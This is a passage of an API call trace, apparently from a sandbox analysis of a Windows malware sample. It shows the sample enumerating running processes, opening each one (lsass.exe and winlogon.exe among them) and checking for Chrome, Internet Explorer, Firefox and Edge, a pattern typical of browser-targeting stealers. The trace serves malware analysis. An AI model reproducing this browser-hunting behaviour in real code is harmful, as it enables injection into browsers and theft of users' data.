	[0193.962] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0193.962] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0193.962] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0193.963] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0xad0
	[0193.963] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0193.963] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0193.963] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0193.963] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0193.964] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0193.964] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0193.964] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0193.964] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0193.964] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0193.965] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0xad4
	[0193.965] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0193.965] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0193.965] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0193.965] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0193.966] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0193.966] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0193.966] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0193.966] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0193.966] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0193.967] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0xad8
	[0193.967] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0193.967] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0193.967] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0193.967] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0193.967] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0193.967] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0193.968] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0193.968] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0193.968] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0193.969] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0xadc
	[0193.969] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0193.969] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0193.969] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0193.969] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0193.969] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0193.969] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0193.970] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0193.970] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0193.970] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0193.971] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0xae0
	[0193.971] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0193.971] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0193.971] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0193.971] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0193.971] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0193.972] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0193.972] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0193.972] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0193.972] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0193.973] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0xae4
	[0193.973] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0193.973] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0193.973] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0193.973] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0193.973] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0193.973] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0193.974] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0193.974] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0193.974] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0193.975] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0xae8
	[0193.975] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0193.975] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0193.975] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0193.975] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0193.976] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0193.976] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0193.976] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0193.976] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0193.976] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0193.977] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0xaec
	[0193.977] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0193.977] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0193.978] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0193.978] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0193.978] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0193.978] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0193.978] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0193.978] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0193.978] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0193.979] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0xaf0
	[0193.979] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0193.979] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0193.979] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0193.980] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0193.980] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0193.980] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0193.980] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0193.980] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0193.980] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0193.981] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0xaf4
	[0193.981] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0193.981] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0193.981] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0193.981] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0193.982] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0193.982] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0193.982] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0193.982] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0193.982] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0193.983] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0xaf8
	[0193.983] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0193.983] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0193.983] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0193.983] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0193.984] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0193.984] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0193.984] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0193.984] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0193.984] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0193.985] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0xafc
	[0193.985] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0193.985] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0193.985] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0193.985] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0193.986] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0193.986] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0193.986] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0193.986] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0193.986] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0193.987] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0xb00
	[0193.987] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0193.987] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0193.987] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0193.987] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0193.988] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0193.988] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0193.988] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0193.988] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0193.988] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0193.989] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0xb04
	[0193.989] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0193.989] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0193.989] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0193.989] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0193.990] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0193.990] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0193.990] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0193.990] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0193.990] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0193.991] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0xb08
	[0193.991] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0193.991] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0193.991] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0193.991] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0193.991] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0193.991] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0193.992] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0193.992] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0193.992] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0193.993] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0xb0c
	[0193.993] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0193.993] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0193.993] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0193.993] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0193.993] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0193.993] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0193.994] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0193.994] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0193.994] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0193.995] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0xb10
	[0193.995] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0193.995] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0193.995] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0193.995] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0193.995] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0193.995] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0193.996] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0193.996] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0193.996] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0193.996] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0xb14
	[0193.997] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0193.997] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0193.997] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0193.997] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0193.997] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0193.997] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0193.997] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0193.998] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0193.998] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0193.998] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0xb18
	[0193.998] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0193.999] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0193.999] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0193.999] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0193.999] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0193.999] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0193.999] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0193.999] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.000] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0194.000] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0xb1c
	[0194.000] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.000] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0194.001] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.001] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.001] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.001] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0194.001] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.001] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.002] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0194.027] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0xb20
	[0194.027] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.027] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0194.028] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.028] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.028] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.028] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0194.028] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.028] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.028] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0194.029] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0xb24
	[0194.029] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.029] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0194.030] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.030] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.030] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.030] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0194.030] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.030] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.030] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0194.031] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0xb28
	[0194.031] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.031] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0194.031] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.031] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.032] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.032] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0194.032] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.032] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.032] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0194.033] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0194.033] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0194.034] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0xb2c
	[0194.034] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.034] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0194.035] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.035] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.035] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.035] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0194.036] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.036] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.036] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0194.037] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0xb30
	[0194.037] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
